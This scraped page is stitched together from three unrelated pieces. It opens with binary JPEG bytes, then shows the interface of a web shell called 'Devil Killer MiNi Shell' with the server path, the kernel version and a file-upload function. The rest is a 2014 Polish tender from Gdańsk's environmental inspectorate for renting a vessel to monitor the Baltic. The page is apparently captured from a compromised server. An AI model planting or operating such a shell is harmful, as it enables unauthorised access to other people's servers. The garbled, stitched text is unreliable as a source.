JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140218/56724-N-2014.html

<p class="kh_header"><b>Gdańsk: Wynajem jednostki pływającej wraz z załogą w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku</b><br>
<b>Numer ogłoszenia: 56724 - 2014; data zamieszczenia: 18.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Ochrony Środowiska , ul. Trakt św. Wojciecha 293, 80-001 Gdańsk, woj. pomorskie, tel. 058 3094911 do 13, faks 058 3094634.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdansk.wios.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem jednostki pływającej wraz z załogą w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajem jednostki pływającej, wraz z załogą, umożliwiającej prowadzenie monitoringu morskich wód przejściowych i przybrzeżnych (do 1 mili morskiej od brzegu). Badania monitoringowe prowadzone będą w roku 2014, w okresie od marca do listopada, w dwóch rejonach: 
a) w rejonie od Krynicy Morskiej do Łeby - część I,
b) w rejonie  Ustki i Rowów - część II.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.60.00.00-0, 60.65.11.00-7, 90.73.31.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawcy wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca składający ofertę wykazał, że jednostka pływająca, którą dysponuje lub będzie dysponował, posiada ważną Kartę Bezpieczeństwa wynikającą ze spełniania przepisów Ustawy z dnia 18 sierpnia 2011r  o bezpieczeństwie morskim (Dz. U. z 2011r. Nr 228 poz. 1368 ze zm.) oraz Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 listopada 2012r. w sprawie inspekcji i audytów oraz certyfikatów statku morskiego (Dz. U. z 2012r. poz. 1313).
Ocena spełniania wyżej wymienionego warunku nastąpi na podstawie oświadczenia, którego wzór stanowi załącznik nr 5 do SIWZ oraz dokumentu, o którym mowa w części VI ust. 1, pkt. 1.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę, wraz z ofertą, oświadczenia o spełnianiu warunków udziału w postępowaniu, z wykorzystaniem wzoru dokumentu stanowiącego załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania odpowiednim potencjałem technicznym Zamawiający uzna, jeśli Wykonawca udokumentuje, że dysponuje lub będzie dysponować jednostką pływającą (statkiem/łodzią hybrydową) spełniającą wymogi określone w rozdziale III pkt. 1.3. i 1.4. SIWZ. W tym celu Wykonawca:
a) opisze jednostkę/jednostki pływającą/pływające, którą/którymi dysponuje lub będzie dysponował (nazwa, rodzaj, typ) oraz opisze jej podstawowe parametry techniczne,
b) wskaże i opisze wyposażenie jednostki/jednostek w urządzenia i sprzęt niezbędny do wykonania przedmiotu zamówienia,
c) opisze funkcje urządzeń i sprzętu oraz ich podstawowe parametry techniczne i eksploatacyjne,
d) określi podstawę dysponowania wskazanym potencjałem technicznym.
Ocena spełniania wyżej wymienionego warunku nastąpi na podstawie oświadczenia, którego wzór stanowi załącznik nr 5 do SIWZ, oraz dokumentu, o którym mowa w części VI ust. 1, pkt. 1.4., ppkt. 1.4.1.SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający uzna, jeśli Wykonawca udokumentuje, że dysponuje lub będzie dysponować osobami mającymi uprawnienia w zakresie prowadzenia jednostek pływających, o których mowa w rozdz. III ust. 1, pkt. 1.3. i 1.4., na wodach morskich. Zamawiający wymaga, aby Wykonawca wykazał i udokumentował, że dysponuje lub będzie dysponował min. 2 osobami posiadającymi uprawnienia do kierowania i obsługi każdej z jednostek (statek, łódź hybrydowa) tj.: 
a) min. 1 osobą posiadającą stosowne uprawnienia do prowadzenia jednostki pływającej - statku lub łodzi hybrydowej,
b) min. 1 osobą posiadającą właściwe uprawnienia do pełnienia funkcji załogi oraz do obsługi statku lub łodzi hybrydowej.
Ocena spełniania wyżej wymienionego warunku nastąpi na podstawie oświadczenia, którego wzór stanowi załącznik nr 5 do SIWZ, oraz dokumentu, o którym mowa w części VI ust. 1, pkt. 1.4., ppkt. 1.4.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajmy nie wyznacza szczegółowego warunku w tym zakresie i odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku. 
Ocena spełniania wyżej wymienionego warunku nastąpi na podstawie oświadczenia, którego wzór stanowi załącznik nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w  kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcja III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego  odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, lub przed notariuszem. 
2. Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa rozdziale V siwz, polegać będzie na zasobach innych podmiotów żąda przedłożenia przez Wykonawcę pisemnego zobowiązania podmiotu, na zasobach którego Wykonawca będzie polegać, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Przykładowy formularz zobowiązania podmiotów, spełniający wymogi Zamawiającego, zamieszczono w siwz.
3. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo (oryginał) zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, określające jego zakres i podpisane przez upoważnioną osobę (osoby) - osobę fizyczną lub osoby reprezentujące osobę prawną. Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej i mieć formę pisemną. Fakt ustanowieni Pełnomocnika musi wynikać z załączonych do oferty dokumentów. Jeśli Wykonawca dołącza do oferty kserokopię pełnomocnictwa, musi być ona uwierzytelniona przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy w następujących przypadkach: 
a) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec zakres, termin realizacji przedmiotu umowy oraz wynagrodzenie (np. gdy nastąpi konieczność zmiany terminu lub zakresu wykonania przedmiotu umowy na skutek zmiany zasad finansowania zadania wynikających z podpisanych przez Zamawiającego umów z Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej w Warszawie lub Wojewódzkim Funduszem Ochrony Środowiska i Gospodarki Wodnej w Gdańsku);
b) zakres przedmiotu usługi określony umową może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie przedmiotu umowy w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć. W przypadku ograniczenia zakresu przedmiotu umowy wartość usługi wyłączonej zostanie ustalona w oparciu o stosowne zapisy wynikające z formularza cenowego, stanowiącego załącznik do umowy. W opisanej sytuacji nastąpi zmniejszenie wynagrodzenia i ustalenie jego nowej wartości. W powyższym przypadku Wykonawca może żądać jedynie wynagrodzenia należytego mu z tytułu zrealizowanej już części umowy.
c) zmiany spowodowane nieprzewidzianymi w umowie nadzwyczajnymi warunkami jak np. warunki pogodowe, awaria jednostki pływającej niemożliwa do usunięcia w krótkim terminie lub inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące obiektywną niemożliwością wykonania usługi w wyznaczonym terminie - zmianie może ulec zakres, termin realizacji umowy oraz wynagrodzenie;
d) zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, na uzasadnione wystąpienie Wykonawcy;
e) Zamawiający, na pisemny wniosek Wykonawcy, dopuszcza zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji usługi. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. 
g) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania przedmiotu umowy, zgodnie ze specyfikacją istotnych warunków zamówienia i innymi dokumentami - Zamawiający dopuszcza możliwość zmiany umowy tj. terminu jej wykonania, zakresu oraz wysokości wynagrodzenia.
h) zmiany stawki podatku VAT w przypadku urzędowej zmiany tej stawki - Zamawiający dopuszcza możliwość zmiany wynagrodzenia, za całość lub część realizowanego przedmiotu umowy, uwzględniającej zmianę wysokości stawki podatku VAT.
2. Zmiany umowy, o których mowa w pkt.1 wymagają aneksu w formie pisemnej pod rygorem nieważności i mogą zostać wprowadzone, jedynie w przypadku jeżeli obydwie Strony umowy zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji przedmiotu zamówienia.
3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskie.eu/pl/bip/wios lub www.gdansk.wios.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Inspektorat Ochrony Środowiska, Trakt Św. Wojciecha 293, 80 - 001 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2014 godzina 10:00, miejsce: Wojewódzki Inspektorat Ochrony Środowiska, Trakt Św. Wojciecha 293, 80 - 001 Gdańsk, pok. nr 37(sekretariat), I p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wynajem jednostki pływającej wraz z załogą w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku - w rejonie od Krynicy Morskiej do Łeby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający planuje zrealizowanie w roku 2014, w okresie od 17.03.2014r. do 30.11.2014r., około 42 cykli pomiarowych (rejsów) i pobór próbek z 20 punktów pomiarowo kontrolnych. W zależności od warunków pogodowych ilość dni rejsowych może ulec zmianie.
Wykaz punktów pomiarowo kontrolnych na wodach przybrzeżnych i przejściowych Bałtyku, lokalizację oraz harmonogram i częstotliwość rejsów zaplanowanych w roku 2014 zawiera tabela stanowiąca załącznik nr 1 do SIWZ. W każdym miesiącu w którym zaplanowano badania monitoringowe, przeprowadzony zostanie pobór próbek z 14 punktów pomiarowych, na co przewidziano 6 rejsów. Kolejność poboru próbek na poszczególnych punktach pomiarowo kontrolnych zostanie ustalona z Wykonawcą na początku pierwszego cyklu badawczego. W miesiącu wrześniu planuje się dodatkowo, oprócz poboru próbek wody, pobór osadów dennych w 10 punktach pomiarowo kontrolnych.  
Lokalizację punktów pomiarowo kontrolnych na wodach przejściowych Bałtyku przylegających do województwa pomorskiego zawiera zał. nr 2 do SIWZ (tab. 2 i ryc. 1). 
Lokalizację punktów pomiarowo kontrolnych na wodach przybrzeżnych Bałtyku, przylegających do województwa pomorskiego zawiera zał. nr 3 do SIWZ (tab. 3 i ryc. 2).
Z uwagi na lokalizacje punktów monitoringowych wchodzących w skład części I przedmiotu zamówienia wskazane jest, aby jednostka pływająca stacjonowała w porcie w Gdyni.
Zamawiający posiada wszystkie niezbędne urządzenia do poboru próbek i badań wykonywanych z jednostki pływającej (czerpacze wody, dna, sita, pojemniki na próbki itp.). Przy realizacji przedmiotu zamówienia właściwego dla części I wymagane jest posiadanie własnego lub dysponowanie przez Wykonawcę środkiem transportu, który wykorzystywany będzie przez Zamawiającego do realizacji przedmiotu zamówienia oraz pomoc przedstawiciela Wykonawcy/osoby wskazanej przez Wykonawcę w czynnościach dotyczących poboru próbek na jednostce pływającej. Zamawiający przewiduje do realizacji zadań określonych dla części I przedmiotu zamówienia, wynikających z zakresu monitoringu, maksymalnie dwóch pracowników Zamawiającego. 
Wykonawca I części przedmiotu zamówienia winien posiadać lub dysponować  oprócz jednostki pływającej (jachtu motorowego) opisanego poniżej w pkt 1.3, lekką łodzią hybrydową zapewniającą możliwość jej wodowania z plaży oraz winien posiadać lub dysponować lawetą do  przewożenia łodzi i odpowiedni samochód zapewniający jej sprawne wodowanie z plaży. Konieczność zapewnienia takiej łodzi związana jest ze znacznym oddaleniem od siebie punktów monitoringowych oraz napiętym harmonogramem rejsów. Zamawiający przewiduje, że w niektórych miesiącach, aby zachować zakładany interwał czasowy dla poboru prób, konieczny będzie dojazd samochodem na punkt pomiarowo kontrolny i użycie łodzi. Taka sytuacja może mieć miejsce szczególnie w punktach znacznie oddalonych od portów (punkty C19, C12, C13a, C15, C17, C18), kiedy z powodu niesprzyjającej pogody, wielogodzinny rejs podstawową jednostką pływającą Wykonawcy, może być znacząco utrudniony lub niemożliwy. 
1.3. Wymogi dla jednostki pływającej (jachtu motorowego) i załogi

1.3.1.  Jednostka pływająca realizująca przedmiot zamówienia (rejsy) musi:  
a) posiadać ważną kartę bezpieczeństwa umożliwiającą żeglugę całodobową określającą między innymi rejon pływania, minimalny skład załogi oraz wymagane kwalifikacje załogi,
b) spełniać wymagania techniczne oraz posiadać wyposażenie, w tym środki ratunkowe, wynikające z obowiązujących przepisów, właściwe dla żeglugi po wodach morskich, 
c) zezwolenie na obecność na jednostce pływającej łącznej liczby pasażerów i załogi (w żegludze minimum przybrzeżnej) nie mniejszej niż 4 osoby,
d) załoga (min. 2 osoby) musi posiadać odpowiednie uprawnienia pozwalające na prowadzenie i obsługę jednostki, 
e) być wyposażona w indywidualne środki ratunkowe dla pracowników Zamawiającego przebywających na pokładzie w czasie poboru prób (maksymalnie 2 osób), wynikające z przepisów dotyczących pracy na morzu.

1.3.2. Minimalne parametry techniczne wymagane dla jednostki pływającej (jachtu motorowego) 

a) silnik umożliwiający prędkość podróżną - min. 10 węzłów,
b) zanurzenie umożliwiające pobór próbek w punktach pomiarowo kontrolnych o głębokościach w zakresie od 1,5m do 40 m, 
c) pokład wyposażony w żuraw/dźwig o nośności ok. 0,5 tony oraz kabestan/wyciągarkę elektryczną o udźwigu ok. 100 kg, które umożliwiają zainstalowanie urządzenia do poboru prób osadów dennych o wadze ok. 50kg, 
d) możliwość zamocowania na burcie/relingu ręcznej wyciągarki do poboru próbek wody, 
e) system nawigacji GPS umożliwiający dokładne określenie współrzędnych geograficznych punktu poboru prób, 
f) możliwość utrzymania pozycji w punkcie poboru prób przez około godzinę (kotwica o odpowiedniej masie i długości liny), 
g) pompa wody zaburtowej z możliwością regulacji strumienia podawanej wody, 
h) zaplecze socjalno-sanitarne w postaci: toalety, miejsca przygotowywania i spożywania posiłków zapewniającego podgrzanie posiłku i zagotowanie wody, miejsca do odpoczynku.
 
1.4.  Wymogi dla jednostki pływającej (łodzi hybrydowej) i załogi

1.4.1. Jednostka pływająca realizująca przedmiot zamówienia (rejsy) musi:
  
a) posiadać ważną kartę bezpieczeństwa określającą m.in. minimalny skład załogi oraz wymagane kwalifikacje załogi,
b) spełniać wymagania techniczne oraz posiadać wyposażenie, w tym środki ratunkowe, wynikające z obowiązujących przepisów, właściwe dla żeglugi po wodach morskich, 
c) zezwolenie na obecność na jednostce pływającej łącznej liczby pasażerów i załogi nie mniejszej niż 3 osoby,
d) załoga musi posiadać odpowiednie uprawnienia pozwalające na prowadzenie i obsługę jednostki, 
e) być wyposażona w indywidualne środki ratunkowe dla pracowników Zamawiającego przebywających na pokładzie łodzi w czasie poboru prób (maksymalnie 2 osób), wynikające z przepisów dotyczących pracy na morzu.

1.4.2. Minimalne parametry techniczne wymagane dla jednostki pływającej (łodzi) 

a) silnik umożliwiający prędkość podróżną - min. 10 węzłów,
b) zanurzenie umożliwiające pobór próbek w płytkowodnych punktach pomiarowo kontrolnych o głębokościach ok. 1,5m, 
